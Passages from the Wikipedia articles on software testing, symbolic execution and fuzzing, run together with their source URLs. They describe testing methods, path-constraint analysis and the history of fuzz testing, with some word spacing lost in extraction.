difficult to find in testing. Also,non-functionaldimensions of quality (how it is supposed tobeversus what it is supposed todo) –usability,scalability,performance,compatibility, andreliability– can be subjective; something that constitutes sufficient value to one person may not to another. Although testing for every possible input is not feasible, testing can usecombinatoricsto maximize coverage while minimizing tests.[14] Testing can be categorized many ways.[15] Software testing can be categorized into levels based on how much of thesoftware systemis the focus of a test.[18][19][20][21] There are many approaches to software testing.Reviews,walkthroughs, orinspectionsare referred to as static testing, whereas executing programmed code with a given set oftest casesis referred to asdynamic testing.[23][24] Static testing is often implicit, like proofreading, plus when programming tools/text editors check source code structure or compilers (pre-compilers) check syntax and data flow asstatic program analysis. Dynamic testing takes place when the program itself is run. Dynamic testing may begin before the program is 100% complete in order to test particular sections of code and are applied to discretefunctionsor modules.[23][24]Typical techniques for these are either usingstubs/drivers or execution from adebuggerenvironment.[24] Static testing involvesverification, whereas dynamic testing also involvesvalidation.[24] Passive testing means verifying the system's behavior without any interaction with the software product. Contrary to active testing, testers do not provide any test data but look at system logs and traces. They mine for patterns and specific behavior in order to make some kind of decisions.[25]This is related to offlineruntime verificationandlog analysis. The type of testing strategy to be performed depends on whether the tests to be applied to the IUT should be decided before the testing plan starts to be executed (preset testing[28]) or whether each input to be applied to the IUT can be dynamically dependent on the outputs obtained during the application of the previous tests (adaptive testing[29][30]). Software testing can often be divided into white-box and black-box. These two approaches are used to describe the point of view that the tester takes when designing test cases. A hybrid approach called grey-box that includes aspects of both boxes may also be applied to software testing methodology.[31][32] White-box testing (also known as clear box testing, glass box testing, transparent box testing, and structural testing) verifies the internal structures or workings of a program, as opposed to the functionality exposed to the end-user. In white-box testing, an internal perspective of the system (the source code), as well as programming skills are used to design test cases. The tester chooses inputs to exercise paths through the code and determines the appropriate outputs.[31][32]This is analogous to testing nodes in a circuit, e.g.,in-circuit testing(ICT). While white-box testing can be applied at theunit,integration, andsystemlevels of the software testing process, it is usually done at the unit level.[33]It can test paths within a unit, paths between units during integration, and between subsystems during a system–level test. Though this method of test design can uncover many errors or problems, it might not detect unimplemented parts of the specification or missing requirements. Techniques used in white-box testing include:[32][34] Code coverage tools can evaluate the completeness of a test suite that was created with any method, including black-box testing. This allows the software team to examine parts of a system that are rarely tested and ensures that the most importantfunction pointshave been tested.[35]Code coverage as asoftware metriccan be reported as a percentage for:[31][35][36] 100% statement coverage ensures that all code paths or branches (in terms ofcontrol flow) are executed at least once. This is helpful in ensuring correct functionality, but not sufficient since the same code may process different inputs correctly or incorrectly.[37] Black-box testing (also known as functional testing) describes designing test cases without knowledge of the implementation, without reading the source code. The testers are only aware of what the software is supposed to do, not how it does it.[38]Black-box testing methods include:equivalence partitioning,boundary value analysis,all-pairs testing,state transition tables,decision tabletesting,fuzz testing,model-based testing,use casetesting,exploratory testing, and specification-based testing.[31][32][36] Specification-based testing aims to test the functionality of software according to the applicable requirements.[39]This level of testing usually requires thoroughtest casesto be provided to the tester, who then can simply verify that for a given input, the output value (or behavior), either "is" or "is not" the same as the expected value specified in the test case. Test cases are built around specifications and requirements, i.e., what the application is supposed to do. It uses external descriptions of the software, including specifications, requirements, and designs, to derive test cases. These tests can befunctionalornon-functional, though usually functional. Specification-based testing may be necessary to assure correct functionality, but it is insufficient to guard against complex or high-risk situations.[40] Black box testing can be used to any level of testing although usually not at the unit level.[33] Component interface testing Component interface testing is a variation ofblack-box testing, with the focus on the data values beyond just the related actions of a subsystem component.[41]The practice of component interface testing can be used to check the handling of data passed between various units, or subsystem components, beyond full integration testing between those units.[42][43]The data being passed can be considered as "message packets" and the range or data types can be checked for data generated from one unit and tested for validity before being passed into another unit. One option for interface testing is to keep a separate log file of data items being passed, often with a timestamp logged to allow analysis of thousands of cases of data passed between units for days or weeks. Tests can include checking the handling of some extreme data values while other interface variables are passed as normal values.[42]Unusual data values in an interface can help explain unexpected performance in the next unit. The aim of visual testing is to provide developers with the ability to examine what was happening at the point of software failure by presenting the data in such a way that the developer can easily find the information he or she requires, and the information is expressed clearly.[44][45] At the core of visual testing is the idea that showing someone a problem (or a test failure), rather than just describing it, greatly increases clarity and understanding. Visual testing, therefore, requires the recording of the entire test process – capturing everything that occurs on the test system in video format. Output videos are supplemented by real-time tester input via picture-in-a-picture webcam and audio commentary from microphones. Visual testing provides a number of advantages. The quality of communication is increased drastically because testers can show the problem (and the events leading up to it) to the developer as opposed to just describing it, and the need to replicate test failures will cease to exist in many cases. The developer will have all the evidence he or she requires of a test failure and can instead focus on the cause of the fault and how it should be fixed. Ad hoc testingandexploratory testingare important methodologies for checking software integrity because they require less preparation time to implement, while the important bugs can be found quickly.[46]In ad hoc testing, where testing takes place in an improvised impromptu way, the ability of the tester(s) to base testing off documented methods and then improvise variations of those tests can result in a more rigorous examination of defect fixes.[46]However, unless strict documentation of the procedures is maintained, one of the limits of ad hoc testing is lack of repeatability.[46] Grey-box testing (American spelling: gray-box testing) involves using knowledge of internal data structures and algorithms for purposes of designing tests while executing those tests at the user, or black-box level. The tester will often have access to both "the source code and the executable binary."[47]Grey-box testing may also includereverse engineering(using dynamic code analysis) to determine, for instance, boundary values or error messages.[47]Manipulating input data and formatting output do not qualify as grey-box, as the input and output are clearly outside of the "black box" that we are calling the system under test. This distinction is particularly important when conductingintegration testingbetween two modules of code written by two different developers, where only the interfaces are exposed for the test. By knowing the underlying concepts of how the software works, the tester makes better-informed testing choices while testing the software from outside. Typically, a grey-box tester will be permitted to set up an isolated testing environment with activities, such as seeding adatabase. The tester can observe the state of the product being tested after performing certain actions such as executingSQLstatements against the database and then executing queries to ensure that the expected changes have been reflected. Grey-box testing implements intelligent test scenarios based on limited information. This will particularly apply to data type handling,exception handling, and so on.[48] With the concept of grey-box testing, this "arbitrary distinction" between black- and white-box testing has faded somewhat.[33] Most software systems have installation procedures that are needed before they can be used for their main purpose. Testing these procedures to achieve an installed software system that may be used is known asinstallation testing.[49]: 139These procedures may involve full or partial upgrades, and install/uninstall processes. A common cause of software failure (real or perceived) is a lack of itscompatibilitywith otherapplication software,operating systems(or operating systemversions, old or new), or target environments that differ greatly from the original (such as aterminalorGUIapplication intended to be run on thedesktopnow being required to become aWeb application, which must render in aWeb browser). For example, in the case of a lack ofbackward compatibility, this can occur because the programmers develop and test software only on the latest version of the target environment, which not all users may be running. This results in the unintended consequence that the latest work may not function on earlier versions of the target environment, or on older hardware that earlier versions of the target environment were capable of using. Sometimes such issues can be fixed by proactivelyabstractingoperating system functionality into a separate programmoduleorlibrary. Sanity testingdetermines whether it is reasonable to proceed with further testing. Smoke testingconsists of minimal attempts to operate the software, designed to determine whether there are any basic problems that will prevent it from working at all. Such tests can be used asbuild verification test. Regression testing focuses on finding defects after a major code change has occurred. Specifically, it seeks to uncoversoftware regressions, as degraded or lost features, including old bugs that have come back. Such regressions occur whenever software functionality that was previously working correctly, stops working as intended. Typically, regressions occur as anunintended consequenceof program changes, when the newly developed part of the software collides with the previously existing code. Regression testing is typically the largest test effort in commercial software development,[50]due to checking numerous details in prior software features, and even new software can be developed while using some old test cases to test parts of the new design to ensure prior functionality is still supported. Common methods of regression testing include re-running previous sets of test cases and checking whether previously fixed faults have re-emerged. The depth of testing depends on the phase in the release process and theriskof the added features. They can either be complete, for changes added late in the release or deemed to be risky, or be very shallow, consisting of positive tests on each feature, if the changes are early in the release or deemed to be of low risk. Acceptance testing is system-level testing to ensure the software meets customer expectations.[51][52][53][54] Acceptance testing may be performed as part of the hand-off process between any two phases of development.[citation needed] Tests are frequently grouped into these levels by where they are performed in the software development process, or by the level of specificity of the test.[54] Sometimes, UAT is performed by the customer, in their environment and on their own hardware. OAT is used to conduct operational readiness (pre-release) of a product, service or system as part of aquality management system. OAT is a common type of non-functional software testing, used mainly insoftware developmentandsoftware maintenanceprojects. This type of testing focuses on the operational readiness of the system to be supported, or to become part of the production environment. Hence, it is also known as operational readiness testing (ORT) oroperations readiness and assurance(OR&A) testing.Functional testingwithin OAT is limited to those tests that are required to verify thenon-functionalaspects of the system. In addition, the software testing should ensure that the portability of the system, as well as working as expected, does not also damage or partially corrupt its operating environment or cause other processes within that environment to become inoperative.[55] Contractual acceptance testing is performed based on the contract's acceptance criteria defined during the agreement of the contract, while regulatory acceptance testing is performed based on the relevant regulations to the software product. Both of these two tests can be performed by users or independent testers. Regulation acceptance testing sometimes involves the regulatory agencies auditing the test results.[54] Alpha testing is simulated or actual operational testing by potential users/customers or an independent test team at the developers' site. Alpha testing is often employed for off-the-shelf software as a form of internal acceptance testing before the software goes to beta testing.[56] Beta testing comes after alpha testing and can be considered a form of externaluser acceptance testing. Versions of the software, known asbeta versions, are released to a limited audience outside of the programming team known as beta testers. The software is released to groups of people so that further testing can ensure the product has few faults orbugs. Beta versions can be made available to the open public to increase thefeedbackfield to a maximal number of future users and to deliver value earlier, for an extended or even indefinite period of time (perpetual beta).[57] Functional testingrefers to activities that verify a specific action or function of the code. These are usually found in the code requirements documentation, although some development methodologies work from use cases or user stories. Functional tests tend to answer the question of "can the user do this" or "does this particular feature work." Non-functional testingrefers to aspects of the software that may not be related to a specific function or user action, such asscalabilityor otherperformance, behavior under certainconstraints, orsecurity. Testing will determine the breaking point, the point at which extremes of scalability or performance leads to unstable execution. Non-functional requirements tend to be those that reflect the quality of the product, particularly in the context of the suitability perspective of its users. Continuous testing is the process of executingautomated testsas part of the software delivery pipeline to obtain immediate feedback on the business risks associated with a software release candidate.[58][59]Continuous testing includes the validation of bothfunctional requirementsandnon-functional requirements; the scope of testing extends from validating bottom-up requirements or user stories to assessing the system requirements associated with overarching business goals.[60][61] Destructive testing attempts to cause the software or a sub-system to fail. It verifies that the software functions properly even when it receives invalid or unexpected inputs, thereby establishing therobustnessof input validation and error-management routines.[citation needed]Software fault injection, in the form offuzzing, is an example of failure testing. Various commercial non-functional testing tools are linked from thesoftware fault injectionpage; there are also numerous open-source and free software tools available that perform destructive testing. Performance testing is generally executed to determine how a system or sub-system performs in terms of responsiveness and stability under a particular workload. It can also serve to investigate, measure, validate or verify other quality attributes of the system, such as scalability, reliability and resource usage. Load testingis primarily concerned with testing that the system can continue to operate under a specific load, whether that be large quantities of data or a large number ofusers. This is generally referred to as softwarescalability. The related load testing activity of when performed as a non-functional activity is often referred to asendurance testing.Volume testingis a way to test software functions even when certain components (for example a file or database) increase radically in size.Stress testingis a way to test reliability under unexpected or rare workloads.Stability testing(often referred to as load or endurance testing) checks to see if the software can continuously function well in or above an acceptable period. There is little agreement on what the specific goals of performance testing are. The terms load testing, performance testing,scalability testing, and volume testing, are often used interchangeably. Real-time softwaresystems have strict timing constraints. To test if timing constraints are met,real-time testingis used. Usability testingis to check if the user interface is easy to use and understand. It is concerned mainly with the use of the application. This is not a kind of testing that can be automated; actual human users are needed, being monitored by skilledUI designers. Usability testing can use structured models to check how well an interface works. The Stanton, Theofanos, and Joshi (2015) model looks at user experience, and the Al-Sharafat and Qadoumi (2016) model is for expert evaluation, helping to assess usability in digital applications.[62] Accessibilitytesting is done to ensure that the software is accessible to persons with disabilities. Some of the common web accessibility tests are Security testingis essential for software that processes confidential data to preventsystem intrusionbyhackers. The International Organization for Standardization (ISO) defines this as a "type of testing conducted to evaluate the degree to which a test item, and associated data and information, are protected so that unauthorised persons or systems cannot use, read or modify them, and authorized persons or systems are not denied access to them."[63] Testing forinternationalization and localizationvalidates that the software can be used with different languages and geographic regions. The process ofpseudolocalizationis used to test the ability of an application to be translated to another language, and make it easier to identify when the localization process may introduce new bugs into the product. Globalization testing verifies that the software is adapted for a new culture, such as different currencies or time zones.[64] Actual translation to human languages must be tested, too. Possible localization and globalization failures include: Development testing is a software development process that involves the synchronized application of a broad spectrum of defect prevention and detection strategies in order to reduce software development risks, time, and costs. It is performed by the software developer or engineer during the construction phase of the software development lifecycle. Development testing aims to eliminate construction errors before code is promoted to other testing; this strategy is intended to increase the quality of the resulting software as well as the efficiency of the overall development process. Depending on the organization's expectations for software development, development testing might includestatic code analysis, data flow analysis, metrics analysis, peer code reviews, unit testing, code coverage analysis,traceability, and other software testing practices. A/B testing is a method of running a controlled experiment to determine if a proposed change is more effective than the current approach. Customers are routed to either a current version (control) of a feature, or to a modified version (treatment) and data is collected to determine which version is better at achieving the desired outcome. Concurrent or concurrency testing assesses the behaviour and performance of software and systems that useconcurrent computing, generally under normal usage conditions. Typical problems this type of testing will expose are deadlocks, race conditions and problems with shared memory/resource handling. In software testing, conformance testing verifies that a product performs according to its specified standards. Compilers, for instance, are extensively tested to determine whether they meet the recognized standard for that language. Creating a display expected output, whether asdata comparisonof text or screenshots of the UI,[3]: 195is sometimes called snapshot testing or Golden Master Testing unlike many other forms of testing, this cannot detect failures automatically and instead requires that a human evaluate the output for inconsistencies. Property testing is a testing technique where, instead of asserting that specific inputs produce specific expected outputs, the practitioner randomly generates many inputs, runs the program on all of them, and asserts the truth of some "property" that should be true for every pair of input and output. For example, every output from a serialization function should be accepted by the corresponding deserialization function, and every output from a sort function should be a monotonically increasing list containing exactly the same elements as its input. Property testing libraries allow the user to control the strategy by which random inputs are constructed, to ensure coverage of degenerate cases, or inputs featuring specific patterns that are needed to fully exercise aspects of the implementation under test. Property testing is also sometimes known as "generative testing" or "QuickCheck testing" since it was introduced and popularized by the Haskell libraryQuickCheck.[65] Metamorphic testing (MT) is a property-based software testing technique, which can be an effective approach for addressing the test oracle problem and test case generation problem. The test oracle problem is the difficulty of determining the expected outcomes of selected test cases or to determine whether the actual outputs agree with the expected outcomes. VCR testing, also known as "playback testing" or "record/replay" testing, is a testing technique for increasing the reliability and speed of regression tests that involve a component that is slow or unreliable to communicate with, often a third-party API outside of the tester's control. It involves making a recording ("cassette") of the system's interactions with the external component, and then replaying the recorded interactions as a substitute for communicating with the external system on subsequent runs of the test. The technique was popularized in web development by the Ruby libraryvcr. In an organization, testers may be in a separate team from the rest of thesoftware developmentteam or they may be integrated into one team. Software testing can also be performed by non-dedicated software testers. In the 1980s, the termsoftware testerstarted to be used to denote a separate profession. Notable software testing roles and titles include:[66]test manager,test lead,test analyst,test designer,tester,automation developer, andtest administrator.[67] Organizations that develop software, perform testing differently, but there are common patterns.[2] Inwaterfall development, testing is generally performed after the code is completed, but before the product is shipped to the customer.[68]This practice often results in the testing phase being used as aprojectbuffer to compensate for project delays, thereby compromising the time devoted to testing.[10]: 145–146 Some contend that the waterfall process allows for testing to start when the development project starts and to be a continuous process until the project finishes.[69] Agile software developmentcommonly involves testing while the code is being written and organizing teams with both programmers and testers and with team members performing both programming and testing. One agile practice,test-driven software development(TDD), is a way ofunit testingsuch that unit-level testing is performed while writing the product code.[70]Test code is updated as new features are added and failure conditions are discovered (bugs fixed). Commonly, the unit test code is maintained with the project code, integrated in the build process, and run on each build and as part of regression testing. Goals of thiscontinuous integrationis to support development and reduce defects.[71][70] Even in organizations that separate teams by programming and testing functions, many often have the programmers performunit testing.[72] The sample below is common for waterfall development. The same activities are commonly found in other development models, but might be described differently. Software testing is used in association withverification and validation:[73] The terms verification and validation are commonly used interchangeably in the industry; it is also common to see these two terms defined with contradictory definitions. According to theIEEE StandardGlossary of Software Engineering Terminology:[11]: 80–81 And, according to the ISO 9000 standard: The contradiction is caused by the use of the concepts of requirements and specified requirements but with different meanings. In the case of IEEE standards, the specified requirements, mentioned in the definition of validation, are the set of problems, needs and wants of the stakeholders that the software must solve and satisfy. Such requirements are documented in a Software Requirements Specification (SRS). And, the products mentioned in the definition of verification, are the output artifacts of every phase of the software development process. These products are, in fact, specifications such as Architectural Design Specification, Detailed Design Specification, etc. The SRS is also a specification, but it cannot be verified (at least not in the sense used here, more on this subject below). But, for the ISO 9000, the specified requirements are the set of specifications, as just mentioned above, that must be verified. A specification, as previously explained, is the product of a software development process phase that receives another specification as input. A specification is verified successfully when it correctly implements its input specification. All the specifications can be verified except the SRS because it is the first one (it can be validated, though). Examples: The Design Specification must implement the SRS; and, the Construction phase artifacts must implement the Design Specification. So, when these words are defined in common terms, the apparent contradiction disappears. Both the SRS and the software must be validated. The SRS can be validated statically by consulting with the stakeholders. Nevertheless, running some partial implementation of the software or a prototype of any kind (dynamic testing) and obtaining positive feedback from them, can further increase the certainty that the SRS is correctly formulated. On the other hand, the software, as a final and running product (not its artifacts and documents, including the source code) must be validated dynamically with the stakeholders by executing the software and having them to try it. Some might argue that, for SRS, the input is the words of stakeholders and, therefore, SRS validation is the same as SRS verification. Thinking this way is not advisable as it only causes more confusion. It is better to think of verification as a process involving a formal and technical input document. In some organizations, software testing is part of asoftware quality assurance(SQA) process.[3]: 347In SQA, software process specialists and auditors are concerned with the software development process rather than just the artifacts such as documentation, code and systems. They examine and change thesoftware engineeringprocess itself to reduce the number of faults that end up in the delivered software: the so-called defect rate. What constitutes an acceptable defect rate depends on the nature of the software; a flight simulator video game would have much higher defect tolerance than software for an actual airplane. Although there are close links with SQA, testing departments often exist independently, and there may be no SQA function in some companies.[citation needed] Software testing is an activity to investigate software under test in order to provide quality-related information to stakeholders. By contrast, QA (quality assurance) is the implementation of policies and procedures intended to prevent defects from reaching customers. Quality measures include such topics ascorrectness, completeness,securityandISO/IEC 9126requirements such as capability,reliability,efficiency,portability,maintainability, compatibility, andusability. There are a number of frequently usedsoftware metrics, or measures, which are used to assist in determining the state of the software or the adequacy of the testing. A software testing process can produce severalartifacts. The actual artifacts produced are a factor of the software development model used, stakeholder and organisational needs. Atest planis a document detailing the approach that will be taken for intended test activities. The plan may include aspects such as objectives, scope, processes and procedures, personnel requirements, and contingency plans.[51]The test plan could come in the form of a single plan that includes all test types (like an acceptance or system test plan) and planning considerations, or it may be issued as a master test plan that provides an overview of more than one detailed test plan (a plan of a plan).[51]A test plan can be, in some cases, part of a wide "test strategy" which documents overall testing approaches, which may itself be a master test plan or even a separate artifact. Atest casenormally consists of a unique identifier, requirement references from a design specification, preconditions, events, a series of steps (also known as actions) to follow, input, output, expected result, and the actual result. Clinically defined, a test case is an input and an expected result.[75]This can be as terse as "for condition x your derived result is y", although normally test cases describe in more detail the input scenario and what results might be expected. It can occasionally be a series of steps (but often steps are contained in a separate test procedure that can be exercised against multiple test cases, as a matter of economy) but with one expected result or expected outcome. The optional fields are a test case ID, test step, or order of execution number, related requirement(s), depth, test category, author, and check boxes for whether the test is automatable and has been automated. Larger test cases may also contain prerequisite states or steps, and descriptions. A test case should also contain a place for the actual result. These steps can be stored in a word processor document, spreadsheet, database, or other common repositories. In a database system, you may also be able to see past test results, who generated the results, and what system configuration was used to generate those results. These past results would usually be stored in a separate table. Atest scriptis a procedure or programming code that replicates user actions. Initially, the term was derived from the product of work created by automated regression test tools. A test case will be a baseline to create test scripts using a tool or a program. In most cases, multiple sets of values or data are used to test the same functionality of a particular feature. All the test values and changeable environmental components are collected in separate files and stored as test data. It is also useful to provide this data to the client and with the product or a project. There are techniques to generate Test data. The software, tools, samples of data input and output, and configurations are all referred to collectively as atest harness. A test run is a collection of test cases or test suites that the user is executing and comparing the expected with the actual results. Once complete, a report or all executed tests may be generated. Several certification programs exist to support the professional aspirations of software testers and quality assurance specialists. A few practitioners argue that the testing field is not ready for certification, as mentioned in thecontroversysection. Some of the majorsoftware testing controversiesinclude: It is commonly believed that the earlier a defect is found, the cheaper it is to fix it. The following table shows the cost of fixing the defect depending on the stage it was found.[85]For example, if a problem in the requirements is found only post-release, then it would cost 10–100 times more to fix than if it had already been found by the requirements review. With the advent of moderncontinuous deploymentpractices and cloud-based services, the cost of re-deployment and maintenance may lessen over time. The data from which this table is extrapolated is scant. Laurent Bossavit says in his analysis: The "smaller projects" curve turns out to be from only two teams of first-year students, a sample size so small that extrapolating to "smaller projects in general" is totally indefensible. The GTE study does not explain its data, other than to say it came from two projects, one large and one small. The paper cited for the Bell Labs "Safeguard" project specifically disclaims having collected the fine-grained data that Boehm's data points suggest. The IBM study (Fagan's paper) contains claims that seem to contradict Boehm's graph and no numerical results that clearly correspond to his data points. Boehm doesn't even cite a paper for the TRW data, except when writing for "Making Software" in 2010, and there he cited the original 1976 article. There exists a large study conducted at TRW at the right time for Boehm to cite it, but that paper doesn't contain the sort of data that would support Boehm's claims.[86]
https://en.wikipedia.org/wiki/Software_testing#Code_coverage
Incomputer science,symbolic execution(alsosymbolic evaluationorsymbex) is a means ofanalyzing a programto determine whatinputscause each part of a program toexecute. Aninterpreterfollows the program, assuming symbolic values for inputs rather than obtaining actual inputs as normal execution of the program would. It thus arrives at expressions in terms of those symbols for expressions and variables in the program, and constraints in terms of those symbols for the possible outcomes of each conditional branch. Finally, the possible inputs that trigger a branch can be determined by solving the constraints. The field ofsymbolic simulationapplies the same concept to hardware.Symbolic computationapplies the concept to the analysis of mathematical expressions. Consider the program below, which reads in a value and fails if the input is 6. During a normal execution ("concrete" execution), the program would read a concrete input value (e.g., 5) and assign it toy. Execution would then proceed with the multiplication and the conditional branch, which would evaluate to false and printOK. During symbolic execution, the program reads a symbolic value (e.g.,λ) and assigns it toy. The program would then proceed with the multiplication and assignλ * 2toz. When reaching theifstatement, it would evaluateλ * 2 == 12. At this point of the program,λcould take any value, and symbolic execution can therefore proceed along both branches, by "forking" two paths. Each path gets assigned a copy of the program state at the branch instruction as well as a path constraint. In this example, the path constraint isλ * 2 == 12for theifbranch andλ * 2 != 12for theelsebranch. Both paths can be symbolically executed independently. When paths terminate (e.g., as a result of executingfail()or simply exiting), symbolic execution computes a concrete value forλby solving the accumulated path constraints on each path. These concrete values can be thought of as concrete test cases that can, e.g., help developers reproduce bugs. In this example, theconstraint solverwould determine that in order to reach thefail()statement,λwould need to equal 6. Symbolically executing all feasible program paths does not scale to large programs. The number of feasible paths in a program grows exponentially with an increase in program size and can even be infinite in the case of programs with unbounded loop iterations.[1]Solutions to thepath explosionproblem generally use either heuristics for path-finding to increase code coverage,[2]reduce execution time by parallelizing independent paths,[3]or by merging similar paths.[4]One example of merging isveritesting, which "employs static symbolic execution to amplify the effect of dynamic symbolic execution".[5] Symbolic execution is used to reason about a program path-by-path which is an advantage over reasoning about a program input-by-input as other testing paradigms use (e.g.dynamic program analysis). However, if few inputs take the same path through the program, there is little savings over testing each of the inputs separately. Symbolic execution is harder when the same memory location can be accessed through different names (aliasing). Aliasing cannot always be recognized statically, so the symbolic execution engine can't recognize that a change to the value of one variable also changes the other.[6] Since an array is a collection of many distinct values, symbolic executors must either treat the entire array as one value or treat each array element as a separate location. The problem with treating each array element separately is that a reference such as "A[i]" can only be specified dynamically, when the value for i has a concrete value.[6] Programs interact with their environment by performingsystem calls, receiving signals, etc. Consistency problems may arise when execution reaches components that are not under control of the symbolic execution tool (e.g., kernel or libraries). Consider the following example: This program opens a file and, based on some condition, writes different kind of data to the file. It then later reads back the written data. In theory, symbolic execution would fork two paths at line 5 and each path from there on would have its own copy of the file. The statement at line 11 would therefore return data that is consistent with the value of "condition" at line 5. In practice, file operations are implemented as system calls in the kernel, and are outside the control of the symbolic execution tool. The main approaches to address this challenge are: Executing calls to the environment directly.The advantage of this approach is that it is simple to implement. The disadvantage is that the side effects of such calls will clobber all states managed by the symbolic execution engine. In the example above, the instruction at line 11 would return "some datasome other data" or "some other datasome data" depending on the sequential ordering of the states. Modeling the environment.In this case, the engine instruments the system calls with a model that simulates their effects and that keeps all the side effects in per-state storage. The advantage is that one would get correct results when symbolically executing programs that interact with the environment. The disadvantage is that one needs to implement and maintain many potentially complex models of system calls. Tools such as KLEE,[7]Cloud9, and Otter[8]take this approach by implementing models for file system operations, sockets,IPC, etc. Forking the entire system state.Symbolic execution tools based on virtual machines solve the environment problem by forking the entire VM state. For example, in S2E[9]each state is an independent VM snapshot that can be executed separately. This approach alleviates the need for writing and maintaining complex models and allows virtually any program binary to be executed symbolically. However, it has higher memory usage overheads (VM snapshots may be large). The concept of symbolic execution was introduced academically in the 1970s with descriptions of: the Select system,[13]the EFFIGY system,[14]the DISSECT system,[15]and Clarke's system.[16]
https://en.wikipedia.org/wiki/Symbolic_execution
Inprogrammingandsoftware development,fuzzingorfuzz testingis an automatedsoftware testingtechnique that involves providing invalid, unexpected, orrandom dataas inputs to acomputer program. The program is then monitored for exceptions such ascrashes, failing built-in codeassertions, or potentialmemory leaks. Typically, fuzzers are used to test programs that take structured inputs. This structure is specified, such as in afile formatorprotocoland distinguishes valid from invalid input. An effective fuzzer generates semi-valid inputs that are "valid enough" in that they are not directly rejected by the parser, but do create unexpected behaviors deeper in the program and are "invalid enough" to exposecorner casesthat have not been properly dealt with. For the purpose of security, input that crosses atrust boundaryis often the most useful.[1]For example, it is more important to fuzz code that handles a file uploaded by any user than it is to fuzz the code that parses a configuration file that is accessible only to a privileged user. The term "fuzz" originates from a 1988 class project[2]in the graduate Advanced Operating Systems class (CS736), taught by Prof. Barton Miller at theUniversity of Wisconsin, whose results were subsequently published in 1990.[3][4]To fuzz test aUNIXutility meant to automatically generate random input and command-line parameters for the utility. The project was designed to test the reliability of UNIX command line programs by executing a large number of random inputs in quick succession until they crashed. Miller's team was able to crash 25 to 33 percent of the utilities that they tested. They then debugged each of the crashes to determine the cause and categorized each detected failure. To allow other researchers to conduct similar experiments with other software, the source code of the tools, the test procedures, and the raw result data were made publicly available.[5]This early fuzzing would now be called black box, generational, unstructured (dumb or "classic") fuzzing. According to Prof. Barton Miller, "In the process of writing the project description, I needed to give this kind of testing a name. I wanted a name that would evoke the feeling of random, unstructured data. After trying out several ideas, I settled on the term fuzz."[4] A key contribution of this early work was simple (almost simplistic) oracle. A program failed its test if it crashed or hung under the random input and was considered to have passed otherwise. While test oracles can be challenging to construct, the oracle for this early fuzz testing was simple and universal to apply. In April 2012, Google announced ClusterFuzz, a cloud-based fuzzing infrastructure for security-critical components of theChromium web browser.[6]Security researchers can upload their own fuzzers and collect bug bounties if ClusterFuzz finds a crash with the uploaded fuzzer. In September 2014,Shellshock[7]was disclosed as a family ofsecurity bugsin the widely usedUNIXBashshell; most vulnerabilities of Shellshock were found using the fuzzerAFL.[8](Many Internet-facing services, such as some web server deployments, use Bash to process certain requests, allowing an attacker to cause vulnerable versions of Bash toexecute arbitrary commands. This can allow an attacker to gain unauthorized access to a computer system.[9]) In April 2015, Hanno Böck showed how the fuzzer AFL could have found the 2014 Heartbleed vulnerability.[10][11](TheHeartbleedvulnerability was disclosed in April 2014. It is a serious vulnerability that allows adversaries to decipher otherwiseencrypted communication. The vulnerability was accidentally introduced intoOpenSSLwhich implementsTLSand is used by the majority of the servers on the internet.Shodanreported 238,000 machines still vulnerable in April 2016;[12]200,000 in January 2017.[13]) In August 2016, theDefense Advanced Research Projects Agency(DARPA) held the finals of the firstCyber Grand Challenge, a fully automatedcapture-the-flagcompetition that lasted 11 hours.[14]The objective was to develop automatic defense systems that can discover,exploit, andcorrectsoftware flaws inreal-time. Fuzzing was used as an effective offense strategy to discover flaws in the software of the opponents. It showed tremendous potential in the automation of vulnerability detection. The winner was a system called "Mayhem"[15]developed by the team ForAllSecure led byDavid Brumley. In September 2016, Microsoft announced Project Springfield, a cloud-based fuzz testing service for finding security critical bugs in software.[16] In December 2016, Google announced OSS-Fuzz which allows for continuous fuzzing of several security-critical open-source projects.[17] At Black Hat 2018, Christopher Domas demonstrated the use of fuzzing to expose the existence of a hiddenRISCcore in a processor.[18]This core was able to bypass existing security checks to executeRing 0commands from Ring 3. In September 2020,MicrosoftreleasedOneFuzz, aself-hostedfuzzing-as-a-service platform that automates the detection ofsoftware bugs.[19]It supportsWindowsand Linux.[20]It has been archived three years later on November 1st, 2023.[21] Testing programs with random inputs dates back to the 1950s when data was still stored onpunched cards.[22]Programmers would use punched cards that were pulled from the trash or card decks of random numbers as input to computer programs. If an execution revealed undesired behavior, abughad been detected. The execution of random inputs is also calledrandom testingormonkey testing. In 1981, Duran and Ntafos formally investigated the effectiveness of testing a program with random inputs.[23][24]While random testing had been widely perceived to be the worst means of testing a program, the authors could show that it is a cost-effective alternative to more systematic testing techniques. In 1983,Steve Cappsat Apple developed "The Monkey",[25]a tool that would generate random inputs forclassic Mac OSapplications, such asMacPaint.[26]The figurative "monkey" refers to theinfinite monkey theoremwhich states that a monkey hitting keys at random on a typewriter keyboard for an infinite amount of time will eventually type out the entire works of Shakespeare. In the case of testing, the monkey would write the particular sequence of inputs that would trigger a crash. In 1991, the crashme tool was released, which was intended to test the robustness of Unix andUnix-likeoperating systemsby randomly executing systems calls with randomly chosen parameters.[27] A fuzzer can be categorized in several ways:[28][1] A mutation-based fuzzer leverages an existing corpus of seed inputs during fuzzing. It generates inputs by modifying (or rathermutating) the provided seeds.[29]For example, when fuzzing the image librarylibpng, the user would provide a set of validPNGimage files as seeds while a mutation-based fuzzer would modify these seeds to produce semi-valid variants of each seed. The corpus of seed files may contain thousands of potentially similar inputs. Automated seed selection (or test suite reduction) allows users to pick the best seeds in order to maximize the total number of bugs found during a fuzz campaign.[30] A generation-based fuzzer generates inputs from scratch. For instance, a smart generation-based fuzzer[31]takes the input model that was provided by the user to generate new inputs. Unlike mutation-based fuzzers, a generation-based fuzzer does not depend on the existence or quality of a corpus of seed inputs. Some fuzzers have the capability to do both, to generate inputs from scratch and to generate inputs by mutation of existing seeds.[32] Typically, fuzzers are used to generate inputs for programs that take structured inputs, such as afile, a sequence of keyboard or mouseevents, or a sequence ofmessages. This structure distinguishes valid input that is accepted and processed by the program from invalid input that is quickly rejected by the program. What constitutes a valid input may be explicitly specified in an input model. Examples of input models areformal grammars,file formats,GUI-models, andnetwork protocols. Even items not normally considered as input can be fuzzed, such as the contents ofdatabases,shared memory,environment variablesor the precise interleaving ofthreads. An effective fuzzer generates semi-valid inputs that are "valid enough" so that they are not directly rejected from theparserand "invalid enough" so that they might stresscorner casesand exercise interesting program behaviours. A smart (model-based,[32]grammar-based,[31][33]or protocol-based[34]) fuzzer leverages the input model to generate a greater proportion of valid inputs. For instance, if the input can be modelled as anabstract syntax tree, then a smart mutation-based fuzzer[33]would employ randomtransformationsto move complete 